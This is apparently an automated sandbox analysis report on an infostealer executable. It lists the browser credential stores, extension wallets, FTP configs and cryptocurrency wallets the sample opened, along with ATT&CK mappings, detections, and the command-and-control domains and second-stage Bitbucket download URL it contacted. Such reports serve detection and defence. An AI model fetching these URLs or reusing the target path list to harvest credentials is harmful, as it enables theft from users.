                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2232123533.0000000001154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2231739674.0000000001154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: TmmiCE5Ulm.exe PID: 5600, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: TmmiCE5Ulm.exe PID: 5600, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                2
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                2
                Process Injection
                LSASS Memory751
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                TmmiCE5Ulm.exe58%ReversingLabsWin32.Infostealer.Tinba
                TmmiCE5Ulm.exe69%VirustotalBrowse
                TmmiCE5Ulm.exe100%AviraTR/Crypt.TPM.Gen
                TmmiCE5Ulm.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                3.5.16.86
                truefalse
                  high
                  bitbucket.org
                  185.166.143.49
                  truefalse
                    high
                    steamcommunity.com
                    23.55.153.106
                    truefalse
                      high
                      lev-tolstoi.com
                      104.21.66.86
                      truefalse
                        high
                        bbuseruploads.s3.amazonaws.com
                        unknown
                        unknownfalse
                          high
                          sweepyribs.lat
                          unknown
                          unknownfalse
                            high
                            necklacebudi.lat
                            unknown
                            unknownfalse
                              high
                              sustainskelet.lat
                              unknown
                              unknownfalse
                                high
                                crosshuaht.lat
                                unknown
                                unknownfalse
                                  high
                                  rapeflowwj.lat
                                  unknown
                                  unknownfalse
                                    high
                                    grannyejh.lat
                                    unknown
                                    unknownfalse
                                      high
                                      aspecteirs.lat
                                      unknown
                                      unknownfalse
                                        high
                                        discokeyus.lat
                                        unknown
                                        unknownfalse
                                          high
                                          energyaffai.lat
                                          unknown
                                          unknownfalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            aspecteirs.latfalse
                                              high
                                              sweepyribs.latfalse
                                                high
                                                sustainskelet.latfalse
                                                  high
                                                  rapeflowwj.latfalse
                                                    high
                                                    https://steamcommunity.com/profiles/76561199724331900false
                                                      high
                                                      energyaffai.latfalse
                                                        high
                                                        https://lev-tolstoi.com/apifalse
                                                          high
                                                          grannyejh.latfalse
                                                            high
                                                            necklacebudi.latfalse
                                                              high
                                                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                                                                high
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngTmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://duckduckgo.com/chrome_newtabTmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://player.vimeo.comTmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://duckduckgo.com/ac/?q=TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://steamcommunity.com/?subsection=broadcastsTmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://bitbucket.org/TUTmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688197419.00000000011AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://store.steampowered.com/subscriber_agreement/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.gstatic.cn/recaptcha/TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEETmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.valvesoftware.com/legal.htmTmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.youtube.comTmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.google.comTmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackTmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
